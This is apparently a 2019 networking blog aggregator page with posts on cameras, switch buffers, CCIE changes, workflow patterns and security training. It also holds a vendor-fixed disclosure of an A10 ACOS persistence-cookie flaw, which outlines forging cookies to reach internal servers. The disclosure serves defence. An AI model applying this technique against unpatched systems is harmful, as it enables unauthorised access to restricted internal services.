In good news (for me), Meraki has given me two cameras to play with. I’m particular excited by the MV32 which is an 8MP fisheye lens with 180 degree coverage, and the ability to unwarp the fisheye footage within the browser and (effectively) retrospectively point and zoom the camera to an area of interest. The footage we saw demonstrated was impressive quality, and showed no signs of having come from a 180 degree fisheye. When I get a chance to test them, I will be posting further.

Disclosures

Cisco Meraki presented at Tech Field Day Extra at Cisco Live US, 2019. Please see my Disclosures page for more information.

If you liked this post, please do click through to the source at Meraki In The Middle – Smart Security Cameras and give me a share/like. Thank you!

by John Herbert at June 12, 2019 03:30 PM

My Etherealmind
ipSpace.net Blog (Ivan Pepelnjak)

Switch Buffer Sizes and Fermi Estimates

In my quest to understand how much buffer space we really need in high-speed switches I encountered an interesting phenomenon: we no longer have the gut feeling of what makes sense, sometimes going as far as assuming that 16 MB (or 32MB) of buffer space per 10GE/25GE data center ToR switch is another $vendor shenanigan focused on cutting cost. Time for another set of Fermi estimates.

Let’s take a recent data center switch using Trident II+ chipset and having 16 MB of buffer space (source: awesome packet buffers page by Jim Warner). Most of switches using this chipset have 48 10GE ports and 4-6 uplinks (40GE or 100GE).

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 12, 2019 05:46 AM

XKCD Comics

June 11, 2019

Potaroo blog

Network Protocols and their Use

In June I participated in a workshop, organized by the Internet Architecture Board, on the topic of protocol design and effect, looking at the differences between initial design expectations and deployment realities. These are my impressions of the discussions that took place at this workshop.

June 11, 2019 06:00 PM

Moving Packets

Orange Matter: Why Your Infrastructure Sucks For Automation

<figure class="wp-block-image">Orange Matter Logo</figure>

I’ve been blogging for Solarwinds recently, posting on Orange Matter, with a cross-post to the Thwack Geek Speak forum. Let’s face it, unless we get to build an infrastructure from the ground up, our existing mass of one-off solutions and workarounds makes automating our infrastructure an absolute nightmare.

This post appeared on Orange Matter as “Why Your Infrastctructure Sucks For Automation“, but I’m also linking to the version posted on Thwack, because that version of the post includes pretty pictures. And who doesn’t like a pretty picture?

<figure class="wp-block-image"></figure>

I’d love it if you were to take a moment to visit and read, and maybe even comment!

If you liked this post, please do click through to the source at Orange Matter: Why Your Infrastructure Sucks For Automation and give me a share/like. Thank you!

by John Herbert at June 11, 2019 02:47 PM

My Etherealmind
Honest Networker
ipSpace.net Blog (Ivan Pepelnjak)

Use Per-Link Prefixes in Network Data Models

We got pretty far in our data deduplication in network data model journey, from initial attempts to network modeled as a graph… but we still haven’t got rid of all the duplicate information.

For example, if we have multiple devices connected to the same subnet, why should we have to specify IP address and subnet mask for every device (literally begging the operators to make input errors). Wouldn’t it be better (assuming we don’t care about exact IP addresses on core links) to assign IP addresses automatically?

by Ivan Pepelnjak (noreply@blogger.com) at June 11, 2019 05:09 AM

June 10, 2019

Moving Packets

Viavi Enterprise Provides Unexpected Network Insights

<figure class="wp-block-image"></figure>

Many of us will have experienced the challenges of taking a performance alert (or user complaint) and drilling down to root cause. Performance issues can be intermittent, and it can be difficult to get visibility of what caused a problem at a particular time. Viavi Enterprise thinks it has the answer, combining analysis of packet feeds (e.g. from taps and mirror ports) and IPFix, xFlow and cloud service flow logs to monitor application performance as it would be experienced by a user. Sounds good? It looked pretty good, too.

Johnny Five Need Input!

Nothing can happen without data, and that comes from a number of potential sources.

Observer Gigastor

<figure class="wp-block-image"></figure>

The Observer Gigastor product is available as a virtualized solution (to capture east-west traffic in virtualized environments), a portable appliance for tactical deployment, and two hardware appliance models (in a charming shade of purple) which can provide from 96TB to 1.2PB of storage. The idea of Gigastor is to capture packets at line rate and retain the raw packet data in case it’s needed later. The packets are analyzed, and that metadata is fed to the reporting and visualization system, Observer Apex.

Observer GigaFlow

<figure class="wp-block-image"></figure>

It’s not always possible or practical to tap into a packet flow, so the Observer GigaFlow product, rather than ingesting data packets, ingests flow data from sources like IPFix, Netflow, jFlow, sFlow, cloud provider flow records, and so on. Analysis is performed on these data and the app offers its own interface into the results, but can also feed into the larger picture in Observer Apex.

Observer Apex

<figure class="wp-block-image"></figure>

Observer Apex pulls together the packet analysis from Gigastor and the flow analysis from GigaFlow and puts them together into a unified interface. Given the appropriate information, Apex can associate flows to physicals location and it derives a score for each site from 1 (bad) to 10 (excellent) representing the user experience at that site. This score is based on around 200 factors including anomaly detection, which can be customized to some degree, but attempts to represent a wide range of factors which can go into the user experience.

At a high level, looking at a global view, “problem” sites can be easily identified, at which point the user can start to use what I think is one of Apex’s greatest strengths: drill-down.

Drilling Down

Drilling into the site reveals the next level breakdown to show perhaps which application users are seeing a bad response from. Then drilling into the application, all sessions to that app can be seen. Drill down into a single session, and – with help from Gigastor – it’s possible to see a ping-pong diagram of the interactions between client and server, which – assuming the flow is not encrypted – can including the actual decoded commands and responses being exchanged. Want to see that in Wireshark? No problem. The interface is responsive and I can easily imagine spending weeks on end just digging into problems by drilling down to find the source.

The Network Video Recorder

In my opinion, recording and storing every packet flowing through the next is a great idea, but is probably not terribly practical, but the Gigastor appliance makes doing so far more plausible with its 1.2 petabyte storage option. Cunningly though, it’s possible to tell Gigastor which flows to store and analyze versus which should just be analyzed, so it’s possible to gain deep visibility into key flows while still retaining metadata about all interesting flows.

Since Gigastor keeps those stored packets for a defined period of time (subject to any storage limitations), it acts like a network video recorder and, like a VCR, it makes it possible to go back in time and see the actual packets (perhaps the actual queries or commands) being sent when problems were reported, and hopefully identify the nature of the problem. As a network guy, I’d love to be able to wind the clock back and be able to say “actually, the server was showing slow responses to queries at that time, and the network looked fine. Reducing the Mean Time To Innocence is something I wholeheartedly support.

Additionally, keeping copies of the network packets provides a resource for forensics after a security incident, including the ability to track back in time to see, perhaps, when an issue first began (the “patient zero”).

My 2 Bits

I’m excited by the possibilities offered by the Viavi Observer products. I would love to be able to position Observer Gigastor devices at every ingress point to my network and be able to troubleshoot recent issues and retrospectively download packet captures of problem flows. I’d love to see the scores that Apex would assign to each of my sites, and see if they correlate with user reports. In other words, I think I’d like to see this product in my network.

My concerns however, are of scale; not of the product itself, but of my ability to pay for all the Gigastor capture nodes and the GigaFlow analysis appliances that would be required to properly cover my network (even assuming I monitor at choke points). Costs are not on the Viavi website, so perhaps I’m imagining something worse than it is, but just from a hardware perspective, 1.2PB of storage isn’t going to come cheap, if that’s the appliance I chose.

Nonetheless, the potential value to network and security operations here could be huge. I really like the look of this product, and I plan to investigate it further in the future.

Disclosures

Viavi Enterprise presented at the Tech Field Day Extra event at Cisco Live US, 2019. Please see my Disclosures page for more information.

If you liked this post, please do click through to the source at Viavi Enterprise Provides Unexpected Network Insights and give me a share/like. Thank you!

by John Herbert at June 10, 2019 07:52 PM

The Networking Nerd

The CCIE Times Are A Changing

Today is the day that the CCIE changes. A little, at least. The news hit just a little while ago that there are some changes to the way the CCIE certification and recertification process happens. Some of these are positive. Some of these are going to cause some insightful discussion. Let’s take a quick look at what’s changing and how it affects you. Note that these changes are not taking effect until February 24, 2020, which is in about 8 months.

Starting Your Engines

The first big change comes from the test that you take to get yourself ready for the lab. Historically, this has been a CCIE written exam. It’s a test of knowledge designed to make sure you’re ready to take the big lab. It’s also the test that has been used to recertify your CCIE status.

With the new change on Feb. 24th, the old CCIE written will go away. The test that is going to be used to qualify candidates to take the CCIE lab exam is the Core Technology exam from the CCNP track. The Core Technology exam in each CCNP track serves a dual purpose in the new Cisco certification program. If you’re going for your CCNP you need the Core Technology exam and one other exam from a specific list. That Core Technology exam also qualifies you to schedule a CCIE lab attempt within 18 months.

This means that the CCNP is going to get just a little harder now. Instead of taking multiple tests over routing, switching, or voice you’re going to have all those technologies lumped together into one long exam. There’s also going to be more practical questions on the Core Technologies exam. That’s great if you’re good at configuring devices. But the amount of content on the individual exam is going to increase.

Keeping The Home Fires Burning

Now that we’ve talked about qualification to take the lab exam, let’s discuss the changes to recertification. The really good news is that the Continuing Education program is expanding and giving more options for recertification.

The CCIE has always required you to recertify every two years. But if you miss your recertification date you have a one year “grace period”. Your CCIE status is suspended but you don’t lose your number until the end of the one-year period. This grace period has informally been called the “penalty box” by several people in the industry. Think of it like a time out to focus on getting your certification current.

Starting February 24, 2020, this grace period is now formalized as an extra year of certification. The CCIE will now be valid for 3 years instead of just 2. However, if you do not recertified by the end of the 3rd year, you lose your number. There is no grace period any longer. This means you need to recertify within the 3-year period.

As far as how to recertify, you now have some additional options. You can still recertify using CE credits. The amount has gone up from 100 to 120 credits to reflect the additional year that CCIEs get to recertify now. There is also a new way to recertify using a combination of CE credits and tests. You can take the Core Technologies exam and use 40 CE credits to recertify. You can also pass two Specialist exams and use 40 CE credits to recertify. This is a great way to pick up skills in a new discipline and learn new technologies. You can choose to pass a single Specialist exam and use 80 CE credits to recertify within the three-year period. This change is huge for those of us that need to recertify. It’s a great option that we don’t have today. They hybrid model offers great flexibility for those that are taking tests but also taking e-learning or classroom training.

The biggest change, however, is in the test-only option. Historically, all you needed to do is pass the CCIE written every two years to recertify. With the changes to the written exam used to qualify you to take the lab, that is no longer an option. As listed above, simply taking the Core Technologies exam is not enough. You must also take 40 CE credits.

So, what tests will recertify you? The first is the CCIE lab. If you take and pass a lab exam within the recertification period you’ll be recertified. You can also take three Specialist exams. The combination of three will qualify you for recertification. You can also take the Core Technologies exam and another professional exam to recertify. This means that passing the test required for the CCNP will recertify your CCIE. There is still one Expert-level exam that will work to recertify your CCIE – the CCDE written. Because no changes were made to the CCDE program in this project, the CCDE written exam will still recertify your CCIE.

Also, your recertification date is no longer dependent on your lab date. Historically your recert date was based on the date you took your lab. Now, it’s going to be whatever date you pass your exam or submit your CEs. The good news is this means that all your certifications are going to line up. Because your CCNA and CCNP dates have always been 3 years as well, recertifying your CCIE will sync up all your certifications to the date you recertify your CCIE. It’s a very welcome quality of life change.

Another welcome change is that there will no longer be a program fee when submitting your CE credits. As soon as you have amassed the right combination you just submit them and you’re good to go. No $300 fee. There’s also a great change for anyone that has been a CCIE for 20 years or more. If you choose to “retire” to Emeritus status you no longer have to pay the program fee. You will be a CCIE forever. Even if you are an active CCIE and you choose not to recertify after 20 years you will be automatically enrolled in the Emeritus program.

Managing Change

So, this is a big change. A single test will no longer recertify your number. You’re going to have to expand your horizons by investing in continuing education. You’re going to have to take a class or do some outside study on a new topic like wireless or security. That’s the encouragement from Cisco going forward. You’re not going to be able to just keep learning the same BGP and OSPF-related topics over and over again and hope to keep your certification relevant.

This is going to work out in favor of the people that complain the CCIE isn’t relevant to the IT world of today. Because you can learn about things like network automation and programmability and such from Cisco DevNet and have it count for CCIE recertification, you have no excuse not to bring yourself current to modern network architecture. You also have every opportunity to learn about new technologies like SD-WAN, ACI, and many other things. Increasing your knowledge takes care of keeping your CCIE status current.

Yes, you’re going to lose the ability to panic after two and a half years and cram to take a single test one or two times to reset for the next three years. You also need to be on top of your CCIE CE credits and your recert date. This means you can’t be lazy any longer and just assume you need to recertify every odd or even year. It means that your life will be easier without tons of cramming. But it means that the way things used to be aren’t going to be like that any longer.


Tom’s Take

Change is hard. But it’s inevitable. The CCIE is the most venerable certification in the networking world and one of the longest-lived certifications in the IT space. But that doesn’t mean it’s carved in stone as only being a certain way forever. The CCIE must change to stay relevant. And that means forcing CCIEs to stay relevant. The addition of the continuing education piece a couple of years ago is the biggest and best thing to happen in years. Expanding the ability for us to learn new technologies and making them eligible for us to recertify is a huge gift. What we need to do is embrace it and keep the CCIE relevant. We need to keep the people who hold those certifications relevant. Because the fastest way to fade into obscurity is to keep things the way they’ve always been.

You can find more information about all the changes in the Cisco Certification Program at http://Cisco.com/nextlevel

by networkingnerd at June 10, 2019 05:43 PM

My Etherealmind

◎ Standards Bodies, Patents, Huawei and Unexpected Consquences

Without access to standards bodies Huawei loses patent rights to a wide range of technology.

The post ◎ Standards Bodies, Patents, Huawei and Unexpected Consquences appeared first on EtherealMind.

by Greg Ferro at June 10, 2019 05:02 PM

ipSpace.net Blog (Ivan Pepelnjak)

Repost: Automation Without Simplification

The No Scripting Required to Start Your Automation Journey blog post generated lively discussions (and a bit of trolling from the anonymous peanut gallery). One of the threads focused on “how does automation work in real life IT department where it might be challenging to simplify operations before automating them due to many exceptions, legacy support…

Here’s a great answer provided by another reader:

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 10, 2019 09:11 AM

XKCD Comics

June 07, 2019

IPEngineer.net

Automation Workflow Patterns

Workflows vary from seriously simple to notoriously complex and as humans, we might not even consciously observe the subtleties of what a workflow comprises of. Workflows are the source of control semantics and comprise of many elements, some obvious some not so. This post is a primer to help you think about the kind of workflows you encounter drawn from my experiences. This post offers a view with conviction backed by experience.

To set the tone, workflows have logical flow, temporal behaviour, consume and transmit data, for processing triggers, acting on decision points and returning states. Since the 1970s, I believe we haven’t actually come that far from a workflow orchestration standpoint. Atomic units of code exist that do one thing well, a real win for the 1970s and good automation systems understand how to instantiate, feed these atomic blobs of logic data and grab their exit state and content. On a *nix system, it’s possible to use bash to create a single chain of tasks using the | operator. One blob of logic effectively feeds it’s output to the next blob of logic. Who needs an orchestrator? It’s sensible to include detection logic within each blob of code to figure out when human readable or serialised data is required. That way these contained units of logic can be used both by human operators and in automated workflows.

$ do X | Y | Z | process_result

In the context of this post, a node is something I’ll use to describe a decision point or task within a workflow.

Signals should also be interpreted by the workflow runner. Operating systems issue them to processes and as such, the orchestrator that runs the automated process should listen for them and process them properly.

Run To Completion Serial Workflows are instantiated with a complete set of data that the contained logic uses to execute. These kinds of workflows have all the data at run-time they need to make decisions and act on them. This means they can also run asynchronously and spawned in a headless manner if required. The style of workflow is lock-step, meaning that one action or decision point, directly calls another action or decision point. Temporarlly, each node in a workflow takes as much time as it needs to execute and flow traditionally ocurs top down. Once all of the nodes are executed the workflow exists with a proper exit code (zero for success, one or higher for anything else).

A → B → C

Run To Completion Combinational Workflows are instantiated with zero or more input parameters and the workflow will stop and query data sources for inputs to decisions that are contained within workflow nodes. Once invoked, they continue to run, but may start other standalone sections of the workflow asynchronously. The end result is a combination of nodal activity that all eventually join to the finishing node directly, or emit a signal with data to be correlated.

A1 → B1 → C1 → D1
A2 → B2 → C2 → D1

Temporally Fragmented Serial Workflows are those that have time as a step-flow mechanism. Not necessarily timed as in by delay, but by trigger source events. Let’s walk through an example.

Example: A physical interface drops that has a BGP neighbour peered. From a signal perspective, we could see telemetry information on the physical interface drop first (X), and then shortly after once timers expire, we see signalling around BGP neighbour states (Y) and route withdrawals (Z).

Temporally, we have an ordered set of serial signals related to one event occurrence, but they temporally fragmented. It isn’t like we’ve written some code that says “If interface goes down, do X, Y and Z in that order”. The system is reporting on a set of signals in the order they happen but for all the system knows, the order and occurrence of signals is by complete chance and in the order we need them for our trouble shooting process.
Let’s talk about workflows in this manner. If our troubleshooting process was to investigate a BGP drop, we might base the ingress to our workflow on seeing a BGP peer down signal. Ok, so we’re off. We run some logic. What happens when now we see our route withdrawals? Although they’re related to our workflow, what do we do now? Our initial set of tasks ran based on one signal in isolation. How do we correlate all of the information together? Chaining workflows together based on temporal transmission of signals is tricky and very hard to manage. You have lots of fragments of signal→action which are weakly linked.

There are two patterns that work well with temporally fragmented workflows.

Pattern A: Use a central key/value store and each node within the macro-workflow must check the key/value store for introspective information. Assuming workflows are not concrete but templated, then it will be possible to publish the same workflow for different devices, interfaces and systems etc. This means a node has to be aware of what end system it’s working with so it can look out for related signals. There’s no point in instantiating part of a macro-workflow for Router A on condition X and instantiating part of a macro-workflow for condition Y on router B if the X and Y conditions are for router C. Introspection is key. A key/value store can act as a point of context and synchronisation.

Macro workflow = A1 → B1 → C1

Implemented workflow:
K/V signal → A1
K/V signal → B1
K/V signal → C1

Pattern B: Macro-workflow components can query each other with concrete references. That means at the time of instantiation, variables have to be passed in so the components know what to query for. I view this very similarly to combinational logic gates. Latches may need to be thought about so that signals aren’t missed, unless the system is call-back based. Some commercial products offer this method and I struggle to justify the sheer mental complexity. They may be referred to as “daisy-chained workflows” but without clear linkage of inter-relationships other than signals based on an imaginary timeline.

Macro workflow = A1 → B1 → C1

Implemented workflow:
Signal → A1
Signal → B1 (query A1, if signal condition is true, execute)
Signal → C1 (query B1, if signal condition is true, execute)


Temporally Fragmented Combinational Workflows
. Oh boy. I view these as lots of blind and deaf people playing a game of football with one goal. For the record, I dislike football, but I think the analogy works. Even simple workflows become complex because of the time based triggering of asynchronous and unrelated tasks that are being instantiated. They’re related in the macro-sense, but not in the instantiated sense. We just have to hope all of the white sticks whack the ball towards the goal. Don’t do this.

Macro-workflow = Signal → A1 → Goal1 
Signal → B1 → Goal1 
Signal → C1 → Goal1

Implemented workflow: 
A1 (external signal)
B1 (external signal)
C1 (external signal)

It’s very difficult to correlate useful information between macro-workflow components and even do something with the resulting information. Complex indeed.

Sanitised Workflows are those I consider to be well thought, boring (as many inputs known at invocation), with clear and concise actions that steer the decisions in the workflow tree. They have state machines to block and wait for signals to drive them to their next state. They’re also potentially long lived without the danger of fragmented processes making them difficult to troubleshoot. One process can absolutely setup trigger conditions for another, but do you want to troubleshoot this at 3am? I certainly do not.

Some workflows are unidimensional and will only ever have a single invocation. Running power, air, payroll and traffic systems are good examples of unidimensional workflows. The last thing you want is one workflow telling a generator to run and another in parallel trying to turn it off.

Multi-dimensional workflows are concurrency safe and the multi-dimensional capabilities are an advantage. Think scale-out environments where the same logic is re-used but with different operating variables.

Some workflows you’ll work on will clearly be unidimensional or multi-dimensional. Know your process, know your decision points and make your logic atomic.

Keep your workflows clean and try to decouple as much invocation logic from temporal triggers as possible. Instead have your logic wait and then timeout if a gating signal never ocurrd. Logs are cleaner, your cognitive load is lower and overall, the automata is reliable.

Nice to get this off my chest after a long week. Thanks for reading and I hope it was useful.

The post Automation Workflow Patterns appeared first on ipengineer.net.

by David Gee at June 07, 2019 10:29 PM

The Networking Nerd

Home on the Palo Alto Networks Cyber Range

You’ve probably heard many horror stories by now about the crazy interviews that companies in Silicon Valley put you though. Sure, some of the questions are downright silly. How would I know how to weigh the moon? But the most insidious are the ones designed to look like skills tests. You may have to spend an hour optimizing a bubble sort or writing some crazy code that honestly won’t have much impact on the outcome of what you’ll be doing for the company.

Practical skills tests have always been the joy and the bane of people the world over. Many disciplines require you to have a practical examination before you can be certified. Doctors are one. The Cisco CCIE is probably the most well-known in IT. But what is the test really quizzing you on? Most people will admit that the CCIE is an imperfect representation of a network at best. It’s a test designed to get people to think about networks in different ways. But what about other disciplines? What about the ones where time is even more of the essence than it was in CCIE lab?

Red Team Go!

I was at Palo Alto Networks Ignite19 this past week and I got a chance to sit down with Pamela Warren. She’s the Director of Government and Industry Initiatives at Palo Alto Networks. She and her team have built a very interesting concept that I loved to see in action. They call it the Cyber Range.

The idea is simple enough on the surface. You take a classroom setting with some workstations and some security devices racked up in the back. You have your students log into a dashboard to a sandbox environment. Then you have your instructors at the front start throwing everything they can at the students. And you see how they respond.

The idea for the Cyber Range came out of military exercises that NATO used to run for their members. They wanted to teach their cyberwarfare people how to stop sophisticated attacks and see what their skill levels were with regards to stopping the people that could do potential harm to nation state infrastructure or worse to critical military assets during a war. Palo Alto Networks get involved in helping years ago and Pamela grew the idea into something that could be offered as a class.

Cyber Range has a couple of different levels of interaction. Level 1 is basic stuff. It’s designed to teach people how to respond to incidents and stop common exploits from happening. The students play the role of a security operations team member from a fictitious company that’s having a very bad week. You learn how to see the log files, collect forensics data, and ultimately how to identify and stop attackers across a wide range of exploits.

If Level 1 is the undergrad work, Cyber Range Level 2 is postgrad in spades. You dig into some very specific and complicated exploits, some of which have only recently been discovered. During my visit the instructors were teaching everyone about the exploits used by OilRig, a persistent group of criminals that love to steal data through things like DNS exfiltration tunnels. Level 2 of the Cyber Range takes you deep down the rabbit hole to see inside specific attacks and learn how to combat them. It’s a great way to keep up with current trends in malware and exploitive behavior.

Putting Your Money Where Your Firewall Is

To me, the most impressive part of this whole endeavor is how Palo Alto Networks realizes that security isn’t just about sitting back and watching an alert screen. It’s about knowing how to recognize the signs that something isn’t right. And it’s about putting an action plan into place as soon as that happens.

We talk a lot about automation of alerts and automated incident response. But at the end of the day we still need a human being to take a look at the information and make a decision. We can winnow that decision down to a simple Yes or No with all the software in the world but we need a brain doing the hard work after the automation and data analytics pieces give you all the information they can find.

More importantly, this kind of pressure cooker testing is a great way to learn how to spot the important things without failing in reality. Sure, we’ve heard all the horror stories about CCIE candidates that typed in debug IP packet detail on core switch in production and watched it melt down. But what about watching an attacker recon your entire enterprise and start exfiltrating data. And you being unable to stop them because you either don’t recognize the attack vector or you don’t know where to find the right info to lock everything down? That’s the value of training like the Cyber Range.

The best part for me? Palo Alto Networks will bring a Cyber Range to your facility to do the experience for your group! There are details on the page above about how to set this up, but I got a great pic of everything that’s involved here (sans tables to sit at):

How can you turn down something like this? I would have loved to put something like this on for some of my education customers back in the day!


Tom’s Take

I really wish I would have had something like the Cyber Range for myself back when I was fighting virus outbreaks and trying to tame Conficker infections. Because having a sandbox to test myself against scripted scenarios with variations run by live people beats watching a video about how to “easily” fix a problem you may never see in that form. I applaud Palo Alto Networks for their approach to teaching security to folks and I can’t wait to see how Pamela grows the Cyber Range program!

For more information about Palo Alto Networks and Cyber Range, make sure to visit http://Paloaltonetworks.com/CyberRange/

by networkingnerd at June 07, 2019 03:01 PM

My Etherealmind
ipSpace.net Blog (Ivan Pepelnjak)

As Expected: Where Have All the SDN Controllers Gone?

Roy Chua (SDx Central) published a blog post titled “Where Have All the SDN Controllers Gone” a while ago describing the gradual disappearance of SDN controller hype.

No surprise there - some of us were pointing out the gap between marketing and reality years ago.

It was evident to anyone familiar with how networking actually works that in a generic environment the drawbacks of orthodox centralized control plane SDN approach far outweigh its benefits. There are special use cases like intelligent patch panels where a centralized control plane makes sense.

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 07, 2019 05:07 AM

Potaroo blog

Happy Birthday BGP

The first RFC describing BGP, RFC 1105, was published in June 1989, thirty years ago. That makes BGP a venerable protocol in the internet context and considering that it holds the Internet together it's still a central piece of the Internet's infrastructure. How has this critically important routing protocol fared over these thirty years and what are its future prospects? It BGP approaching its dotage or will it be a feature of the Internet for decades to come?

June 07, 2019 02:00 AM

XKCD Comics

June 06, 2019

Moving Packets

A10 Networks ACOS Critical Insecure Cookie Vulnerability 2 of 2

The following summarizes an HTTP persistence cookie vulnerability that I identified in A10 ACOS ADC software. This was disclosed to A10 Networks in June 2016 and has now been resolved.

A10 Networks Cookie Vulnerability

As noted in a previous post, ACOS uses insecure HTTP/HTTPS persistence cookies which can allow a malicious user to craft a cookie determining the server and port to which a persistent session should be sent. In addition, for vports using the default “port-based” HTTP cookie persistence, it was discovered that when using the default persistence cookie type, ACOS does not perform a check to ensure that the server/port defined in the cookie is within the configured service-group for that VIP.

The only sanity check appears to be to ensure that the server IP read from the cookie has been configured on the A10 within the same partition. If that constraint is met, packets will be forwarded by ACOS to the real server based solely on the value contained in the cookie. This is extremely serious as it allows a malicious user to connect, for example, through a public VIP and access back end servers used by other VIPs, including those only accessible via internal IPs.

SUMMARY OF VULNERABILITY

When using a vport configured for default (port-based) HTTP cookie-based persistence, a cookie submitted to that vport with the correct name is trusted without any validation of the information contained within.

This would not be an issue if the cookies were secure and thus invulnerable to tampering; however, given that the cookies used weakly obfuscated values, it is trivial to generate arbitrary encoded IP/Port cookie values and by doing so cause the A10 to blindly redirect HTTP sessions to any accessible internal HTTP server.

The implications of this are wide ranging. Enumerating the available servers on an internal network is a simple scripting exercise and once completed, custom cookie creation can be used to direct an IP connection to any valid back end server. For example, if there is an ACL applied to a VIP which limits access to specific IP addresses, it is likely possible to access that restricted service by accessing a public VIP on the same A10 ADC which uses cookie persistence, and using a custom cookie to redirect the incoming session to a back end server for the restricted service. Depending on the implemented architecture of the A10 ADC, the ability to redirect sessions to any available server could potentially expose internal HTTP servers to the Internet through apparently unrelated public VIPs.

SOFTWARE VERSIONS TESTED:

This vulnerability was discovered and validated initially in ACOS 2.7.2-P4-SP2 and reconfirmed most recently in ACOS 4.1.1-P3.

VULNERABLE VERSIONS

This behavior has been core to persistence cookies until now, so it can be reasonably stated that this vulnerability exists in:

  • ACOS 2.7.2 initial release and up to 2.7.2-P10 inclusive
  • ACOS 4.0 initial release up to 4.1.1-P5 inclusive

WORKAROUNDS

One mitigation is to configure all cookie persistence templates with the service-group option; however, enabling this will in turn mean disclosing the service-group name in the cookies. That disclosure may be a lesser risk than continued exposure to this vulnerability, so should be assessed for use as a temporary workaround if a software upgrade is not possible.

FIXED IN

A10 Networks has issued updated software which include a fix for this vulnerability :

  • ACOS 2.7.2-P11 (June 2017)
  • ACOS 4.1.1-P6 (November 2017)

A10 Networks tracked this vulnerability under ID 368800.

AUTHOR / DISCOVERER

John Herbert (http://movingpackets.net)

Vulnerability Details

HTTP persistence cookies generated by A10 ACOS (Advanced Core Operating System) can take one of four forms depending on the match-type defined within the persistence cookie template:

Match-Type Cookie Will Contain
(none) (default) Real server IP and port
server Real server IP
service-group Service-group + real server IP and port
server service-group Service-group + real server IP

The service-group configuration option implies that the ADC will ensure that the returning client will go to the same service-group as it did previously, checking the IP (and optionally, port) defined in the cookie sent by the client for membership in the selected service-group.

Without the service-group option in place, the cookie is only examined (or created, if missing) the first time a client connects to a vport, after which the cookie is trusted when presented by the client. Assuming that a connection can be made to the destination, the session will be directed to the IP and port specified in the cookie.

The weak obfuscation used by ACOS to hide the IP and port information in HTTP persistence cookies mean that it is possible for a malicious client to send a cookie value that the A10 ADC will implicitly trust. In turn the ADC will faithfully create a proxied HTTP connection to the IP and port specified in the cookie so long as the specified destination server is defined somewhere in the partition’s configuration. If routing and source-nat allow the A10 ADC to make a connection to the requested IP/port on behalf of the client, it will be made.

One limitation to this technique is that if the vport being accessed by the malicious user is configured with a server-ssl template to encrypt traffic between the ADC and the real server, any malicious redirected connection attempts will also be made using SSL; which restricts the connectivity to those server ports running SSL. The client-side protocol is irrelevant (HTTP or HTTPS) as a cookie can be supplied by the client over either protocol.

Exploitation

The implications should be obvious. Making an initial HTTP/HTTPS connection to a vport will generate a valid cookie from which the cookie name and the real server and port can easily be extracted. It is then simple to create an automated tool that can create new (false) values for the named cookie and thus scan for available HTTP servers, checking common ports, perhaps starting on the IP subnet extracted from the original persistence cookie.

The cookie sent to the client on first connection to a vport configured using the default cookie persistence type will look like this:

sto-id-[vport]   ABMIGEAKFAAA

The [vport] field is usually a 5-digit integer, but for the purposes of a cookie attack the only relevance to a would-be attacker is to note down the entire cookie name so it can be reused when sending a bogus value to the ADC. Creating false values is made simple courtesy of weak encryption in the cookie.

Recommendation

Users of A10 Networks ACOS 2.7.2 and 4.x using cookie-based persistence should upgrade immediately to the fixed-in versions outlined above, or higher. If not possible, consideration should be given to avoiding using the default port-based HTTP persistence cookies.

If you liked this post, please do click through to the source at A10 Networks ACOS Critical Insecure Cookie Vulnerability 2 of 2 and give me a share/like. Thank you!

by John Herbert at June 06, 2019 04:12 PM

ipSpace.net Blog (Ivan Pepelnjak)

Stop Using GUI to Configure SDN or Intent-Based Products

This blog post was initially sent to subscribers of my SDN and Network Automation mailing list. Subscribe here.

At the end of my vNIC 2018 keynote speech I made a statement along these lines:

The moment you start using GUI with an SDN product you’re back to square one.

That claim confused a few people – Mark left this comment on my blog:

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 06, 2019 06:18 AM